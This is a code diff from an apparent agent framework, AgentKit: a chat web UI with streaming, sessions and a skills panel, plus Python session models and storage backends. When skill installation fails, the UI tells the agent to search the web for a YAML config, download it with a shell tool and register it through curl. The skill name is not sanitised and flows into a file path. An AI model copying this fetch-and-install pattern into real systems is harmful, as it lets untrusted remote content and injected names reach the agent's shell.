.typing-indicator{display:inline-flex;gap:5px;padding:6px 0}
.typing-indicator span{width:7px;height:7px;background:var(--text3);border-radius:50%;animation:bounce 1.4s ease-in-out infinite}
.typing-indicator span:nth-child(2){animation-delay:.15s}
.typing-indicator span:nth-child(3){animation-delay:.3s}
/* ── Input Area ──────────────────────────────────────────────── */
.input-area{padding:16px 24px 20px;background:transparent}
.input-wrap{display:flex;gap:10px;align-items:flex-end;background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-lg);padding:6px 6px 6px 16px;box-shadow:var(--shadow-sm);transition:all .2s}
.input-wrap:focus-within{border-color:var(--primary);box-shadow:0 0 0 3px rgba(59,91,219,.1),var(--shadow-md)}
.input-wrap textarea{flex:1;background:transparent;border:none;padding:8px 0;font-size:14px;color:var(--text);resize:none;outline:none;min-height:40px;max-height:160px;font-family:var(--font);line-height:1.5}
.input-wrap textarea::placeholder{color:var(--text3)}
.btn-send{background:var(--primary);color:#fff;border:none;border-radius:var(--radius);padding:10px 20px;font-size:14px;font-weight:600;cursor:pointer;transition:all .2s;flex-shrink:0;font-family:var(--font)}
.btn-send:hover{background:var(--primary-hover);transform:translateY(-1px);box-shadow:0 2px 8px rgba(59,91,219,.3)}
.btn-send:active{transform:translateY(0)}
.btn-send:disabled{opacity:.4;cursor:not-allowed;transform:none;box-shadow:none}
/* ── Welcome ─────────────────────────────────────────────────── */
.welcome{flex:1;display:flex;align-items:center;justify-content:center;flex-direction:column;gap:16px;color:var(--text2);padding:40px}
.welcome-icon{width:64px;height:64px;background:var(--primary-light);border-radius:var(--radius-xl);display:flex;align-items:center;justify-content:center;font-size:28px;margin-bottom:4px}
.welcome h2{color:var(--text);font-size:24px;font-weight:700;letter-spacing:-0.5px}
.welcome p{font-size:14px;max-width:380px;text-align:center;line-height:1.7;color:var(--text2)}
/* ── Right Sidebar ───────────────────────────────────────────── */
.right-sidebar{width:0;overflow:hidden;background:var(--surface);border-left:1px solid var(--border-light);display:flex;flex-direction:column;transition:width .3s cubic-bezier(.16,1,.3,1);flex-shrink:0}
.right-sidebar.open{width:var(--right-w)}
.right-sidebar-header{padding:16px 16px 12px;display:flex;align-items:center;justify-content:space-between}
.right-sidebar-header h2{font-size:15px;font-weight:700;letter-spacing:-0.2px}
.right-sidebar-content{flex:1;overflow-y:auto;padding:0}
/* ── Tabs ────────────────────────────────────────────────────── */
.tab-bar{display:flex;gap:2px;padding:0 12px;border-bottom:1px solid var(--border-light);background:var(--surface)}
.tab-btn{padding:10px 14px;font-size:12px;font-weight:600;color:var(--text3);background:none;border:none;border-bottom:2px solid transparent;cursor:pointer;transition:all .2s;text-align:center;letter-spacing:.2px;text-transform:uppercase}
.tab-btn:hover{color:var(--text2)}
.tab-btn.active{color:var(--primary);border-bottom-color:var(--primary)}
.tab-panel{display:none;padding:16px}
.tab-panel.active{display:block}
/* ── Skill Grid ──────────────────────────────────────────────── */
.skill-grid{display:grid;grid-template-columns:1fr 1fr;gap:10px}
.skill-card{background:var(--surface2);border:1px solid var(--border-light);border-radius:var(--radius);padding:14px;cursor:pointer;transition:all .2s cubic-bezier(.16,1,.3,1);position:relative}
.skill-card:hover{border-color:var(--primary-subtle);transform:translateY(-2px);box-shadow:var(--shadow-md);background:var(--surface)}
.skill-card .skill-name{font-size:13px;font-weight:600;margin-bottom:5px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;letter-spacing:-0.1px}
.skill-card .skill-desc{font-size:11px;color:var(--text2);line-height:1.5;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden}
.skill-card .skill-tools{font-size:10px;color:var(--primary);margin-top:8px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;font-weight:500;letter-spacing:.2px}
.skill-card .skill-remove{position:absolute;top:8px;right:8px;width:22px;height:22px;border-radius:6px;background:var(--surface);border:1px solid var(--border);color:var(--text3);font-size:13px;cursor:pointer;display:none;align-items:center;justify-content:center;line-height:1;transition:all .15s}
.skill-card:hover .skill-remove{display:flex}
.skill-card .skill-remove:hover{background:var(--danger);color:#fff;border-color:var(--danger)}
/* ── Add Skill ───────────────────────────────────────────────── */
.add-skill-area{margin-top:16px;padding-top:16px;border-top:1px solid var(--border-light)}
.add-skill-label{font-size:12px;color:var(--text2);margin-bottom:8px;font-weight:500}
.add-skill-input{display:flex;gap:8px}
.add-skill-input input{flex:1;background:var(--surface2);border:1px solid var(--border);border-radius:var(--radius-sm);padding:9px 12px;font-size:13px;color:var(--text);outline:none;transition:all .2s;font-family:var(--font)}
.add-skill-input input:focus{border-color:var(--primary);box-shadow:0 0 0 3px rgba(59,91,219,.08)}
.add-skill-input input::placeholder{color:var(--text3)}
.btn-add-skill{background:var(--primary);color:#fff;border:none;border-radius:var(--radius-sm);padding:9px 16px;font-size:13px;font-weight:600;cursor:pointer;transition:all .2s;white-space:nowrap;font-family:var(--font)}
.btn-add-skill:hover{background:var(--primary-hover)}
.btn-add-skill:disabled{opacity:.4;cursor:not-allowed}
.install-status{font-size:11px;margin-top:8px;color:var(--text3);font-weight:500}
.install-status.success{color:var(--success)}
.install-status.error{color:var(--danger)}
/* ── Scrollbar ───────────────────────────────────────────────── */
::-webkit-scrollbar{width:5px}
::-webkit-scrollbar-track{background:transparent}
::-webkit-scrollbar-thumb{background:var(--border);border-radius:3px}
::-webkit-scrollbar-thumb:hover{background:var(--text3)}
/* ── Animations ──────────────────────────────────────────────── */
@keyframes msgIn{from{opacity:0;transform:translateY(8px)}to{opacity:1;transform:translateY(0)}}
@keyframes bounce{0%,80%,100%{transform:translateY(0)}40%{transform:translateY(-8px)}}
@keyframes fadeIn{from{opacity:0}to{opacity:1}}
@keyframes slideInRight{from{opacity:0;transform:translateX(12px)}to{opacity:1;transform:translateX(0)}}
/* ── Mobile ──────────────────────────────────────────────────── */
@media(max-width:768px){
.sidebar{position:fixed;left:-100%;z-index:10;transition:left .3s cubic-bezier(.16,1,.3,1);width:85vw;max-width:320px;box-shadow:var(--shadow-lg)}
.sidebar.open{left:0}
.sidebar-overlay{display:none;position:fixed;inset:0;background:rgba(0,0,0,.3);z-index:9;backdrop-filter:blur(2px)}
.sidebar-overlay.show{display:block}
.mobile-toggle{display:flex!important}
.right-sidebar.open{position:fixed;right:0;z-index:10;width:85vw;max-width:360px;box-shadow:var(--shadow-lg)}
.messages{padding:16px}
.input-area{padding:12px 16px 16px}
.msg{max-width:88%}
}
.mobile-toggle{display:none;align-items:center;justify-content:center;background:none;border:none;color:var(--text);font-size:20px;cursor:pointer;padding:4px}
</style>
</head>
<body>
<div class="app">
<!-- Left Sidebar -->
<div class="sidebar-overlay" id="overlay" onclick="toggleSidebar()"></div>
<aside class="sidebar" id="sidebar">
<div class="sidebar-header">
<div class="sidebar-brand">
<div class="sidebar-logo">A</div>
<h1>AgentKit</h1>
</div>
<button class="btn-new" onclick="createSession()" title="新建对话">+ 新对话</button>
</div>
<div class="session-list" id="sessionList"></div>
</aside>
<!-- Chat -->
<main class="chat-area" id="chatArea">
<div class="chat-header">
<button class="mobile-toggle" onclick="toggleSidebar()">&#9776;</button>
<span class="agent-name" id="agentName">AgentKit</span>
<span class="status" id="connStatus">未连接</span>
<button class="btn-icon" onclick="toggleRightSidebar()" title="技能与工具" id="rightSidebarBtn">&#9881;</button>
</div>
<div class="messages" id="messages">
<div class="welcome" id="welcome">
<div class="welcome-icon">🤖</div>
<h2>欢迎使用 AgentKit</h2>
<p>开始一段新对话,或从侧边栏选择已有会话。</p>
</div>
</div>
<div class="input-area">
<div class="input-wrap">
<textarea id="input" rows="1" placeholder="输入消息..." onkeydown="handleKey(event)" oninput="autoResize(this)"></textarea>
<button class="btn-send" id="sendBtn" onclick="sendMessage()">发送</button>
</div>
</div>
</main>
<!-- Right Sidebar -->
<aside class="right-sidebar" id="rightSidebar">
<div class="right-sidebar-header">
<h2>工具</h2>
<button class="btn-icon" onclick="toggleRightSidebar()" title="关闭" style="width:28px;height:28px;font-size:14px">&times;</button>
</div>
<div class="tab-bar">
<button class="tab-btn" onclick="switchTab('sources')" data-tab="sources">来源</button>
<button class="tab-btn active" onclick="switchTab('skills')" data-tab="skills">技能</button>
<button class="tab-btn" onclick="switchTab('templates')" data-tab="templates">模板</button>
</div>
<div class="right-sidebar-content">
<!-- Sources Tab -->
<div class="tab-panel" id="tab-sources">
<div class="empty-state" style="padding:20px">信息来源配置即将上线。</div>
</div>
<!-- Skills Tab -->
<div class="tab-panel active" id="tab-skills">
<div class="skill-grid" id="skillGrid"></div>
<div class="add-skill-area">
<div class="add-skill-label">安装新技能</div>
<div class="add-skill-input">
<input type="text" id="installSkillName" placeholder="技能名称..." onkeydown="if(event.key==='Enter')installSkill()" oninput="updateInstallBtn()">
<button class="btn-add-skill" id="installBtn" onclick="installSkill()" disabled>搜索</button>
</div>
<div class="install-status" id="installStatus"></div>
</div>
</div>
<!-- Templates Tab -->
<div class="tab-panel" id="tab-templates">
<div class="empty-state" style="padding:20px">输出模板配置即将上线。</div>
</div>
</div>
</aside>
</div>
<script>
// ── State ──────────────────────────────────────────────────────────────
let sessions = [];
let activeSessionId = null;
let ws = null;
let isStreaming = false;
let currentAgentBubble = null;
let skills = [];
const API = '/api/v1/chat';
const SKILLS_API = '/api/v1/skills';
// ── API helpers ────────────────────────────────────────────────
async function api(base, path, opts = {}) {
const res = await fetch(base + path, {
...opts,
headers: { 'Content-Type': 'application/json', ...opts.headers },
});
if (!res.ok) throw new Error(`API ${res.status}: ${await res.text()}`);
return res.json();
}
// ── Sessions ───────────────────────────────────────────────────
async function loadSessions() {
try {
sessions = await api(API, '/sessions');
} catch {
sessions = [];
}
renderSessions();
const savedId = localStorage.getItem('agentkit_active_session');
if (savedId && sessions.some(s => s.session_id === savedId)) {
await selectSession(savedId);
}
}
function renderSessions() {
const el = document.getElementById('sessionList');
if (!sessions.length) {
el.innerHTML = '<div class="empty-state">暂无对话<br>点击 <b>+ 新对话</b> 开始</div>';
return;
}
el.innerHTML = sessions.map(s => {
const t = new Date(s.created_at);
const time = t.toLocaleDateString() === new Date().toLocaleDateString()
? t.toLocaleTimeString([], {hour:'2-digit',minute:'2-digit'})
: t.toLocaleDateString([], {month:'short',day:'numeric'});
const title = s.metadata?.title || `对话 ${s.session_id.slice(0,6)}`;
const active = s.session_id === activeSessionId ? 'active' : '';
return `<div class="session-item ${active}" onclick="selectSession('${s.session_id}')">
<span class="title">${esc(title)}</span>
<span class="time">${time}</span>
<span class="del" onclick="event.stopPropagation();deleteSession('${s.session_id}')" title="删除">&times;</span>
</div>`;
}).join('');
}
async function createSession() {
try {
const s = await api(API, '/sessions', {
method: 'POST',
body: JSON.stringify({ agent_name: 'default', metadata: { title: '新对话' } }),
});
sessions.unshift(s);
selectSession(s.session_id);
} catch (e) {
console.error('Create session failed:', e);
}
}
async function deleteSession(id) {
try {
await api(API, `/sessions/${id}`, { method: 'DELETE' });
sessions = sessions.filter(s => s.session_id !== id);
if (activeSessionId === id) {
activeSessionId = null;
localStorage.removeItem('agentkit_active_session');
disconnectWs();
showWelcome();
}
renderSessions();
} catch (e) {
console.error('Delete session failed:', e);
}
}
async function selectSession(id) {
activeSessionId = id;
localStorage.setItem('agentkit_active_session', id);
renderSessions();
showChat();
try {
const msgs = await api(API, `/sessions/${id}/messages`);
renderHistory(msgs);
} catch {
renderHistory([]);
}
connectWs(id);
}
// ── WebSocket ──────────────────────────────────────────────────
function connectWs(sessionId) {
disconnectWs();
const proto = location.protocol === 'https:' ? 'wss:' : 'ws:';
const url = `${proto}//${location.host}${API}/ws/${sessionId}`;
ws = new WebSocket(url);
ws.onopen = () => { setConnStatus('已连接', true); };
ws.onmessage = (e) => { handleWsMessage(JSON.parse(e.data)); };
ws.onclose = () => { setConnStatus('未连接', false); ws = null; };
ws.onerror = () => { setConnStatus('连接错误', false); };
}
function disconnectWs() {
if (ws) { ws.close(); ws = null; }
setConnStatus('未连接', false);
}
function handleWsMessage(msg) {
switch (msg.type) {
case 'connected':
setConnStatus('已连接', true);
break;
case 'token':
if (!currentAgentBubble) {
currentAgentBubble = appendMessage('agent', '');
isStreaming = true;
updateSendBtn();
}
currentAgentBubble.textContent += msg.content || '';
scrollToBottom();
break;
case 'final_answer':
if (currentAgentBubble) {
const current = currentAgentBubble.textContent || '';
const final = msg.content || '';
if (!current.trim() || final.length > current.length) {
currentAgentBubble.textContent = final;
}
currentAgentBubble = null;
} else {
appendMessage('agent', msg.content || '');
}
isStreaming = false;
updateSendBtn();
scrollToBottom();
break;
case 'step':
if (msg.data?.event_type === 'tool_call') {
appendStep(`使用工具: ${msg.data?.data?.tool_name || 'tool'}`);
}
break;
case 'skill_match':
if (msg.data?.skill) {
appendStep(`技能: ${msg.data.skill} (${msg.data.method}, ${Math.round((msg.data.confidence || 0) * 100)}%)`);
}
break;
case 'error':
appendMessage('agent', `[错误] ${msg.data?.message || '未知错误'}`);
currentAgentBubble = null;
isStreaming = false;
updateSendBtn();
break;
}
}
// ── Send message ───────────────────────────────────────────────
async function sendMessage() {
const input = document.getElementById('input');
const text = input.value.trim();
if (!text) return;
// Auto-create session if none is active
if (!activeSessionId) {
try {
const s = await api(API, '/sessions', {
method: 'POST',
body: JSON.stringify({ agent_name: 'default', metadata: { title: text.slice(0, 30) } }),
});
sessions.unshift(s);
activeSessionId = s.session_id;
localStorage.setItem('agentkit_active_session', s.session_id);
renderSessions();
showChat();
renderHistory([]);
connectWs(s.session_id);
// Wait for WebSocket to open before sending
await new Promise(resolve => {
const check = () => ws && ws.readyState === WebSocket.OPEN ? resolve() : setTimeout(check, 50);
check();
});
} catch (e) {
console.error('Auto-create session failed:', e);
return;
}
}
if (!ws || ws.readyState !== WebSocket.OPEN) return;
appendMessage('user', text);
input.value = '';
autoResize(input);
ws.send(JSON.stringify({ type: 'message', content: text }));
currentAgentBubble = null;
isStreaming = true;
updateSendBtn();
}
function handleKey(e) {
if (e.key === 'Enter' && !e.shiftKey) {
e.preventDefault();
sendMessage();
}
}
// ── UI helpers ─────────────────────────────────────────────────
function appendMessage(role, content) {
hideWelcome();
const container = document.getElementById('messages');
const div = document.createElement('div');
const cssRole = role === 'assistant' ? 'agent' : role;
div.className = `msg ${cssRole}`;
const bubble = document.createElement('div');
bubble.className = 'bubble';
bubble.textContent = content;
div.appendChild(bubble);
const meta = document.createElement('div');
meta.className = 'meta';
meta.textContent = cssRole === 'user' ? '你' : '智能体';
div.appendChild(meta);
container.appendChild(div);
scrollToBottom();
return bubble;
}
function appendStep(text) {
hideWelcome();
const container = document.getElementById('messages');
const div = document.createElement('div');
div.className = 'msg agent';
const bubble = document.createElement('div');
bubble.className = 'bubble';
bubble.style.cssText = 'opacity:.5;font-size:12px;font-style:italic;border:none;background:transparent;padding:4px 8px;box-shadow:none';
bubble.textContent = text;
div.appendChild(bubble);
container.appendChild(div);
scrollToBottom();
}
function renderHistory(msgs) {
const container = document.getElementById('messages');
container.innerHTML = '';
if (!msgs.length) {
container.innerHTML = '<div class="welcome" id="welcome"><div class="welcome-icon">🤖</div><h2>欢迎使用 AgentKit</h2><p>开始一段新对话,或从侧边栏选择已有会话。</p></div>';
return;
}
for (const m of msgs) {
if (m.role === 'user' || m.role === 'assistant') {
appendMessage(m.role, m.content);
}
}
scrollToBottom();
}
function showWelcome() { const el = document.getElementById('welcome'); if (el) el.style.display = 'flex'; }
function hideWelcome() { const el = document.getElementById('welcome'); if (el) el.style.display = 'none'; }
function showChat() { hideWelcome(); }
function setConnStatus(text, connected) {
const el = document.getElementById('connStatus');
el.textContent = text;
el.className = 'status' + (connected ? ' connected' : '');
}
function updateSendBtn() { document.getElementById('sendBtn').disabled = isStreaming; }
function scrollToBottom() { const el = document.getElementById('messages'); el.scrollTop = el.scrollHeight; }
function autoResize(el) { el.style.height = 'auto'; el.style.height = Math.min(el.scrollHeight, 160) + 'px'; }
function esc(s) { const d = document.createElement('div'); d.textContent = s; return d.innerHTML; }
function toggleSidebar() {
document.getElementById('sidebar').classList.toggle('open');
document.getElementById('overlay').classList.toggle('show');
}
// ── Right Sidebar ──────────────────────────────────────────────
function toggleRightSidebar() {
document.getElementById('rightSidebar').classList.toggle('open');
if (document.getElementById('rightSidebar').classList.contains('open')) {
loadSkills();
}
}
function switchTab(tabId) {
document.querySelectorAll('.tab-btn').forEach(b => b.classList.toggle('active', b.dataset.tab === tabId));
document.querySelectorAll('.tab-panel').forEach(p => p.classList.toggle('active', p.id === `tab-${tabId}`));
}
// ── Skills ─────────────────────────────────────────────────────
async function loadSkills() {
try {
skills = await api(SKILLS_API, '');
renderSkillGrid();
} catch (e) {
console.error('Load skills failed:', e);
skills = [];
renderSkillGrid();
}
}
function renderSkillGrid() {
const grid = document.getElementById('skillGrid');
if (!skills.length) {
grid.innerHTML = '<div class="empty-state" style="padding:20px;grid-column:1/-1">暂无已安装的技能。</div>';
return;
}
grid.innerHTML = skills.map(s => {
const desc = s.intent_description || s.description || '暂无描述';
const tools = s.bound_tools && s.bound_tools.length ? s.bound_tools.join(', ') : (s.tools && s.tools.length ? s.tools.join(', ') : '');
return `<div class="skill-card" onclick="useSkill('${esc(s.name)}')" title="点击使用此技能">
<button class="skill-remove" onclick="event.stopPropagation();removeSkill('${esc(s.name)}')" title="移除">&times;</button>
<div class="skill-name">${esc(s.name)}</div>
<div class="skill-desc">${esc(desc)}</div>
${tools ? `<div class="skill-tools">${esc(tools)}</div>` : ''}
</div>`;
}).join('');
}
function useSkill(name) {
const skill = skills.find(s => s.name === name);
if (!skill) return;
const input = document.getElementById('input');
const skillRef = `@skill:${name} `;
if (!input.value.includes(skillRef)) {
input.value = skillRef + input.value;
input.focus();
autoResize(input);
}
}
function updateInstallBtn() {
const nameInput = document.getElementById('installSkillName');
const btn = document.getElementById('installBtn');
btn.disabled = !nameInput.value.trim();
}
async function installSkill() {
const nameInput = document.getElementById('installSkillName');
const name = nameInput.value.trim();
if (!name) return;
// Clear input immediately to prevent re-triggering
nameInput.value = '';
updateInstallBtn();
const btn = document.getElementById('installBtn');
const status = document.getElementById('installStatus');
btn.disabled = true;
btn.textContent = '搜索中...';
status.className = 'install-status';
status.textContent = '正在搜索并安装...';
try {
const result = await api(SKILLS_API, '/install', {
method: 'POST',
body: JSON.stringify({ name }),
});
status.className = 'install-status success';
status.textContent = `技能 "${result.name}" 安装成功!`;
await loadSkills();
} catch (e) {
status.className = 'install-status error';
status.textContent = `自动安装失败,正在请求智能体协助...`;
if (ws && ws.readyState === WebSocket.OPEN) {
const installMsg = `请帮我安装一个名为"${name}"的技能。请按以下步骤操作1. 使用搜索工具在网上搜索 "${name}" 的 YAML 配置文件可在技能市场、GitHub 等平台搜索2. 如果找到了,使用 shell 工具将其下载到 configs/skills/${name}.yaml3. 下载完成后,使用 shell 工具执行 curl 命令调用 API 注册curl -X POST http://localhost:${location.port}/api/v1/skills/install -H 'Content-Type: application/json' -d '{"name":"${name}","source":"file://configs/skills/${name}.yaml"}'4. 如果找不到这个技能,请告诉我。`;
appendMessage('user', installMsg);
ws.send(JSON.stringify({ type: 'message', content: installMsg }));
currentAgentBubble = null;
isStreaming = true;
updateSendBtn();
}
} finally {
btn.disabled = false;
btn.textContent = '搜索';
}
}
async function removeSkill(name) {
if (!confirm(`确定移除技能 "${name}" 吗?`)) return;
try {
await api(SKILLS_API, `/${encodeURIComponent(name)}`, { method: 'DELETE' });
await loadSkills();
} catch (e) {
console.error('Remove skill failed:', e);
}
}
// ── Init ───────────────────────────────────────────────────────
loadSessions();
</script>
</body>
</html>

View File

@ -0,0 +1,16 @@
"""Session management - multi-turn conversation support for AgentKit."""
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore, RedisSessionStore, create_session_store
__all__ = [
"Message",
"MessageRole",
"Session",
"SessionStatus",
"SessionManager",
"InMemorySessionStore",
"RedisSessionStore",
"create_session_store",
]

View File

@ -0,0 +1,160 @@
"""SessionManager — high-level API for conversation session management."""
from __future__ import annotations
import logging
from typing import Any
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.store import InMemorySessionStore, SessionStore
logger = logging.getLogger(__name__)
class SessionManager:
"""Manages conversation sessions and their messages.
Provides a high-level API for creating, querying, and updating
sessions, as well as appending and retrieving messages.
"""
def __init__(self, store: SessionStore | None = None):
self._store = store or InMemorySessionStore()
@property
def store(self) -> SessionStore:
return self._store
async def create_session(
self,
agent_name: str,
metadata: dict[str, Any] | None = None,
) -> Session:
"""Create a new conversation session bound to an Agent.
Args:
agent_name: Name of the Agent this session is bound to.
metadata: Optional metadata to attach to the session.
Returns:
The newly created Session.
"""
session = Session(
session_id=Session.new_session_id(),
agent_name=agent_name,
metadata=metadata or {},
)
await self._store.save_session(session)
logger.info(f"Session created: {session.session_id} for agent '{agent_name}'")
return session
async def get_session(self, session_id: str) -> Session | None:
"""Get a session by ID."""
return await self._store.get_session(session_id)
async def pause_session(self, session_id: str) -> Session | None:
"""Pause an active session."""
return await self._store.update_session_status(session_id, SessionStatus.PAUSED)
async def resume_session(self, session_id: str) -> Session | None:
"""Resume a paused session."""
return await self._store.update_session_status(session_id, SessionStatus.ACTIVE)
async def close_session(self, session_id: str) -> Session | None:
"""Close a session. Closed sessions cannot accept new messages."""
return await self._store.update_session_status(session_id, SessionStatus.CLOSED)
async def delete_session(self, session_id: str) -> bool:
"""Delete a session and all its messages."""
return await self._store.delete_session(session_id)
async def list_sessions(
self,
agent_name: str | None = None,
limit: int = 100,
) -> list[Session]:
"""List sessions, optionally filtered by agent name."""
return await self._store.list_sessions(agent_name=agent_name, limit=limit)
async def append_message(
self,
session_id: str,
role: MessageRole,
content: str,
tool_call_id: str | None = None,
agent_name: str | None = None,
metadata: dict[str, Any] | None = None,
) -> Message:
"""Append a message to a session.
Args:
session_id: Target session ID.
role: Message role (user/assistant/tool/system).
content: Message content.
tool_call_id: Optional tool call ID for tool messages.
agent_name: Optional agent name for multi-Agent sessions.
metadata: Optional message metadata.
Returns:
The newly created Message.
Raises:
ValueError: If the session does not exist or is closed.
"""
session = await self._store.get_session(session_id)
if session is None:
raise ValueError(f"Session '{session_id}' not found")
if session.status == SessionStatus.CLOSED:
raise ValueError(f"Session '{session_id}' is closed and cannot accept new messages")
message = Message(
message_id=Session.new_message_id(),
session_id=session_id,
role=role,
content=content,
tool_call_id=tool_call_id,
agent_name=agent_name,
metadata=metadata or {},
)
await self._store.append_message(message)
# Update session's updated_at timestamp
session.updated_at = __import__("datetime").datetime.now(__import__("datetime").timezone.utc)
await self._store.save_session(session)
return message
async def get_messages(
self,
session_id: str,
limit: int | None = None,
offset: int = 0,
) -> list[Message]:
"""Get messages for a session with optional pagination.
Args:
session_id: Target session ID.
limit: Maximum number of messages to return. None for all.
offset: Number of messages to skip from the beginning.
Returns:
List of messages ordered chronologically.
"""
return await self._store.get_messages(session_id, limit=limit, offset=offset)
async def get_chat_messages(self, session_id: str) -> list[dict[str, str]]:
"""Get messages formatted for LLM chat API consumption.
Returns messages as OpenAI-compatible dicts suitable for
passing directly to the ReAct engine or LLM Gateway.
"""
messages = await self._store.get_messages(session_id)
return [m.to_chat_message() for m in messages]
async def count_messages(self, session_id: str) -> int:
"""Count messages in a session."""
return await self._store.count_messages(session_id)
async def health_check(self) -> bool:
"""Check if the underlying store is healthy."""
return await self._store.health_check()

View File

@ -0,0 +1,125 @@
"""Session and Message data models for multi-turn conversations."""
from __future__ import annotations
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timezone
from enum import Enum
from typing import Any
class SessionStatus(str, Enum):
"""Session lifecycle states."""
ACTIVE = "active"
PAUSED = "paused"
CLOSED = "closed"
class MessageRole(str, Enum):
"""Message role — mirrors OpenAI chat message roles."""
SYSTEM = "system"
USER = "user"
ASSISTANT = "assistant"
TOOL = "tool"
@dataclass
class Message:
"""A single message within a conversation session.
Maps directly to the ``messages`` list consumed by the ReAct engine.
"""
message_id: str
session_id: str
role: MessageRole
content: str
tool_call_id: str | None = None
agent_name: str | None = None
created_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
metadata: dict[str, Any] = field(default_factory=dict)
def to_dict(self) -> dict[str, Any]:
return {
"message_id": self.message_id,
"session_id": self.session_id,
"role": self.role.value,
"content": self.content,
"tool_call_id": self.tool_call_id,
"agent_name": self.agent_name,
"created_at": self.created_at.isoformat(),
"metadata": self.metadata,
}
@classmethod
def from_dict(cls, data: dict[str, Any]) -> Message:
return cls(
message_id=data["message_id"],
session_id=data["session_id"],
role=MessageRole(data["role"]),
content=data["content"],
tool_call_id=data.get("tool_call_id"),
agent_name=data.get("agent_name"),
created_at=datetime.fromisoformat(data["created_at"]) if data.get("created_at") else datetime.now(timezone.utc),
metadata=data.get("metadata", {}),
)
def to_chat_message(self) -> dict[str, str]:
"""Convert to OpenAI-compatible chat message dict.
Returns a dict suitable for the ``messages`` parameter of LLM chat APIs.
"""
msg: dict[str, str] = {"role": self.role.value, "content": self.content}
if self.tool_call_id is not None:
msg["tool_call_id"] = self.tool_call_id
return msg
@dataclass
class Session:
"""A conversation session binding a user to an Agent.
Sessions track lifecycle state and accumulate Messages. They are
persisted via :class:`SessionStore` backends.
"""
session_id: str
agent_name: str
status: SessionStatus = SessionStatus.ACTIVE
metadata: dict[str, Any] = field(default_factory=dict)
created_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
updated_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
def to_dict(self) -> dict[str, Any]:
return {
"session_id": self.session_id,
"agent_name": self.agent_name,
"status": self.status.value,
"metadata": self.metadata,
"created_at": self.created_at.isoformat(),
"updated_at": self.updated_at.isoformat(),
}
@classmethod
def from_dict(cls, data: dict[str, Any]) -> Session:
return cls(
session_id=data["session_id"],
agent_name=data["agent_name"],
status=SessionStatus(data.get("status", "active")),
metadata=data.get("metadata", {}),
created_at=datetime.fromisoformat(data["created_at"]) if data.get("created_at") else datetime.now(timezone.utc),
updated_at=datetime.fromisoformat(data["updated_at"]) if data.get("updated_at") else datetime.now(timezone.utc),
)
@staticmethod
def new_session_id() -> str:
"""Generate a new session ID."""
return str(uuid.uuid4())
@staticmethod
def new_message_id() -> str:
"""Generate a new message ID."""
return str(uuid.uuid4())

View File

@ -0,0 +1,351 @@
"""Session store backends — InMemory and Redis."""
from __future__ import annotations
import json
import logging
import os
from typing import Any, Protocol, runtime_checkable
from agentkit.session.models import Message, Session, SessionStatus
logger = logging.getLogger(__name__)
@runtime_checkable
class SessionStore(Protocol):
"""Protocol for session persistence backends."""
async def save_session(self, session: Session) -> None: ...
async def get_session(self, session_id: str) -> Session | None: ...
async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None: ...
async def delete_session(self, session_id: str) -> bool: ...
async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]: ...
async def append_message(self, message: Message) -> None: ...
async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]: ...
async def count_messages(self, session_id: str) -> int: ...
async def health_check(self) -> bool: ...
class InMemorySessionStore:
"""In-memory session store for development and testing."""
def __init__(self, max_sessions: int = 10000, max_messages_per_session: int = 50000):
self._sessions: dict[str, Session] = {}
self._messages: dict[str, list[Message]] = {}
self._max_sessions = max_sessions
self._max_messages_per_session = max_messages_per_session
async def save_session(self, session: Session) -> None:
if len(self._sessions) >= self._max_sessions and session.session_id not in self._sessions:
# Evict oldest closed session
closed = [s for s in self._sessions.values() if s.status == SessionStatus.CLOSED]
if closed:
oldest = min(closed, key=lambda s: s.updated_at)
del self._sessions[oldest.session_id]
self._messages.pop(oldest.session_id, None)
else:
raise RuntimeError("SessionStore is full and no closed sessions to evict")
self._sessions[session.session_id] = session
if session.session_id not in self._messages:
self._messages[session.session_id] = []
async def get_session(self, session_id: str) -> Session | None:
return self._sessions.get(session_id)
async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
session = self._sessions.get(session_id)
if session is None:
return None
session.status = status
session.updated_at = datetime.now(timezone.utc)
return session
async def delete_session(self, session_id: str) -> bool:
if session_id in self._sessions:
del self._sessions[session_id]
self._messages.pop(session_id, None)
return True
return False
async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
sessions = list(self._sessions.values())
if agent_name:
sessions = [s for s in sessions if s.agent_name == agent_name]
sessions.sort(key=lambda s: s.updated_at, reverse=True)
return sessions[:limit]
async def append_message(self, message: Message) -> None:
msgs = self._messages.setdefault(message.session_id, [])
if len(msgs) >= self._max_messages_per_session:
# Remove oldest messages to stay within limit
excess = len(msgs) - self._max_messages_per_session + 1
del msgs[:excess]
msgs.append(message)
async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
msgs = self._messages.get(session_id, [])
sliced = msgs[offset:]
if limit is not None:
sliced = sliced[:limit]
return sliced
async def count_messages(self, session_id: str) -> int:
return len(self._messages.get(session_id, []))
async def health_check(self) -> bool:
return True
class RedisSessionStore:
"""Redis-backed session store for production use.
Key patterns:
- ``agentkit:session:{session_id}`` session metadata (JSON + TTL)
- ``agentkit:session:{session_id}:messages`` message list (Redis list)
"""
KEY_PREFIX = "agentkit:session:"
MSG_SUFFIX = ":messages"
def __init__(self, redis_url: str = "redis://localhost:6379/0", ttl_seconds: int = 86400):
self._redis_url = redis_url
self._ttl_seconds = ttl_seconds
self._redis: Any = None
async def _get_redis(self):
if self._redis is None:
import redis.asyncio as aioredis
self._redis = aioredis.from_url(self._redis_url, decode_responses=True)
return self._redis
def _session_key(self, session_id: str) -> str:
return f"{self.KEY_PREFIX}{session_id}"
def _messages_key(self, session_id: str) -> str:
return f"{self.KEY_PREFIX}{session_id}{self.MSG_SUFFIX}"
async def save_session(self, session: Session) -> None:
redis = await self._get_redis()
